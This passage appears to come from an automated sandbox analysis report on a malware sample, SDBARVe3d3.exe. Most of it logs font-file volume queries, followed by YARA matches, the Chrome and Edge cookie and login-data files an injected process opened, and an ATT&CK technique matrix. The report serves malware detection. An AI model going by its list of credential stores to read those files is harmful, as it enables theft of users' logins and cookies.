                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 2.2.SDBARVe3d3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.SDBARVe3d3.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4134941283.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4134736580.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2051531686.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\fc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\fc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\fc.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\fc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\fc.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\fc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\fc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\fc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\fc.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 2.2.SDBARVe3d3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.SDBARVe3d3.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4134941283.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4134736580.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2051531686.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
